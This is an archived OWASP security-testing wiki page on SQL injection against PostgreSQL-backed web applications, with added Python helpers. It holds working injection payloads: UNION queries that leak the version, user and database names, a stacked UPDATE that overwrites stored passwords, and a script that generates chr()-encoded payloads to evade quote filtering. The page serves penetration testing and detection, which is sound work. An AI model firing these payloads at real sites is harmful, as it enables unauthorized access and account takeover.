This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
OWASP Backend Security Project Testing PostgreSQL
- 1 Overview
- 2 Description
- 3 References
- 4 Tools
Overview
Description
Identifying PostgreSQL
Once a SQL injection has been found, carefully fingerprint the backend database engine before going further: the payloads in this section are PostgreSQL-specific and will simply error out on other engines. The DBMS Fingerprint section of this project already describes how to accomplish this task.
PostgreSQL Peculiarities
The PHP PostgreSQL connector (for example pg_query()) accepts multiple statements in a single query string, using ; as a statement separator, so stacked queries are possible. The rest of the original SQL statement can be truncated on a vulnerable URL by appending the comment sequence --.
Example:
* http://www.example.com/store.php?id=1--hello world
* http://www.example.com/store.php?id=1;--hello world
Banner Grabbing
The function version() can be used to accomplish this task.
select version();
PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
Example (the original query returns three columns and the page displays the second one; LIMIT 1 OFFSET 1 skips the legitimate row so that only the injected row is shown):
http://www.example.com/store.php?id=1
Acme Biscuits
http://www.example.com/store.php?id=1 UNION ALL SELECT NULL,version(),NULL LIMIT 1 OFFSET 1--
PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
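The banner returned by version() is what you fingerprint on, and in an automated test it is worth parsing rather than eyeballing. The following parser is an added example (not code from the OWASP project): it splits a version() banner into version, packaging suffix, platform, compiler and word size, and returns None for anything that is not a PostgreSQL banner, so a MySQL-style version() result is rejected instead of being misread. The two PostgreSQL sample strings are the page's own 8.3.1 banner and a constructed modern-style banner; the MySQL string is likewise constructed.

```python
import re

# Sample banners. The first is the page's own version() output; the second
# and third are constructed for illustration and are not from the original page.
SAMPLE_BANNER = ("PostgreSQL 8.3.1 on i486-pc-linux-gnu, "
                 "compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)")
SAMPLE_BANNER_MODERN = ("PostgreSQL 15.3 (Debian 15.3-1.pgdg120+1) on x86_64-pc-linux-gnu, "
                        "compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit")
SAMPLE_BANNER_MYSQL = "8.0.32-0ubuntu0.22.04.2"   # what MySQL's version() looks like

# Shape of a PostgreSQL version() string:
#   PostgreSQL <ver> [(<packaging>)] on <platform>, compiled by <compiler>[, <N>-bit]
_BANNER_RE = re.compile(
    r"^PostgreSQL\s+(?P<version>\d+(?:\.\d+)*)"
    r"(?:\s+\((?P<distro>[^)]*)\))?"
    r"\s+on\s+(?P<platform>\S+),"
    r"\s+compiled by\s+(?P<compiler>.+?)"
    r"(?:,\s+(?P<bits>\d+-bit))?$"
)


def parse_pg_banner(banner):
    """Parse a PostgreSQL version() banner into its components.

    Returns a dict, or None when the string is not a PostgreSQL banner
    (for example a MySQL version() result), which is itself a fingerprinting signal.
    """
    m = _BANNER_RE.match(banner.strip())
    if not m:
        return None
    parts = m.group("version").split(".")
    # Before PostgreSQL 10 the "major" release was the first two components (8.3);
    # from 10 onwards it is the first component only (15).
    major = ".".join(parts[:2]) if int(parts[0]) < 10 else parts[0]
    return {
        "version": m.group("version"),
        "major": major,
        "distro": m.group("distro"),
        "platform": m.group("platform"),
        "compiler": m.group("compiler"),
        "bits": m.group("bits"),
    }


if __name__ == "__main__":
    for b in (SAMPLE_BANNER, SAMPLE_BANNER_MODERN, SAMPLE_BANNER_MYSQL):
        print(b)
        print("  ->", parse_pg_banner(b))
```

The major version is the field that matters most for what follows on this page: functions such as pg_sleep() or the ability to run stacked queries behave differently across releases, so record it before choosing payloads.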
Blind Injection
Inference
Timing Attacks
Single Quote (un)Escape
A string can be written without any single quotes, to get around quote escaping or filtering in the application, by building it with the chr() function:
* chr(n): returns the character whose code is n (an ASCII value, or a Unicode code point in a UTF8 database)
* ascii(c): returns the code of the first character of the string c
Let's say you want to encode the string 'root':
select ascii('r'); 114
select ascii('o'); 111
select ascii('t'); 116
We can then encode 'root' as:
chr(114)||chr(111)||chr(111)||chr(116)
Example:
http://www.example.com/store.php?id=1; UPDATE users SET PASSWORD=chr(114)||chr(111)||chr(111)||chr(116)--
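Doing the chr() encoding by hand is error-prone for anything longer than a short word, and the same transformation is useful in reverse when you review web server or WAF logs for this obfuscation. The following is an added example written for this page, not code from the OWASP project: an encoder that turns an arbitrary string into a chr()||chr() chain, a payload builder that generalises the UPDATE example above, and a decoder that recovers the plaintext from a chain found in a log line. It assumes the vulnerable parameter is numeric (so no quote is needed to close a string), that the connector accepts ;-separated statements as described above, and that the database uses UTF8 (PostgreSQL's chr() then takes a Unicode code point); the table and column names are the page's own.

```python
import re


def pg_chr_encode(s):
    """Return a PostgreSQL expression that evaluates to s without using quotes.

    Each character becomes chr(<code point>) and the pieces are concatenated
    with ||. Assumes a UTF8 database, where chr() takes a Unicode code point.
    The empty string cannot be expressed as a chr() chain, so '' is returned
    for it; chr(0) is rejected by PostgreSQL, so NUL raises an error here.
    """
    if s == "":
        return "''"
    if "\x00" in s:
        raise ValueError("PostgreSQL chr(0) is not permitted; NUL cannot be encoded")
    return "||".join("chr(%d)" % ord(c) for c in s)


def stacked_update_payload(table, column, value, row_id="1"):
    """Build the stacked-query UPDATE payload shown on this page, with the new
    value chr()-encoded so the payload contains no single quote.

    Assumes a numeric id parameter and a connector that accepts ';'-separated
    statements, as the PostgreSQL Peculiarities section describes.
    """
    return "%s; UPDATE %s SET %s=%s--" % (row_id, table, column, pg_chr_encode(value))


_CHR_RE = re.compile(r"chr\(\s*(\d+)\s*\)", re.IGNORECASE)


def pg_chr_decode(expr):
    """Recover the plaintext from a chr()||chr() chain, e.g. when triaging a
    request logged by a WAF. Anything that is not a chr(<n>) term is ignored."""
    return "".join(chr(int(n)) for n in _CHR_RE.findall(expr))


if __name__ == "__main__":
    payload = stacked_update_payload("users", "password", "root")
    print(payload)
    # Constructed log line, not from the original page, to show the decoder.
    log_line = 'GET /store.php?id=1;%20UPDATE%20users%20SET%20password=' + pg_chr_encode("p@ss'1")
    print(pg_chr_decode(log_line))
```

The decoder is the detection-side counterpart: a run of chr(n) terms joined by || in a query-string parameter is a strong signal of this technique and is easy to alert on, whatever the decoded text turns out to be.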
Current User
The current user can be retrieved with any of the following SQL SELECT statements:
SELECT user
SELECT current_user
SELECT session_user
SELECT getpgusername()
SELECT usename FROM pg_user (note: this lists every login role, not only the current one; add WHERE usename = current_user to restrict it)
Examples:
http://www.example.com/store.php?id=1 UNION ALL SELECT user,NULL,NULL--
http://www.example.com/store.php?id=1 UNION ALL SELECT current_user,NULL,NULL--
Current Database
The native function current_database() returns the name of the current database.
Example:
http://www.example.com/store.php?id=1 UNION ALL SELECT current_database(),NULL,NULL--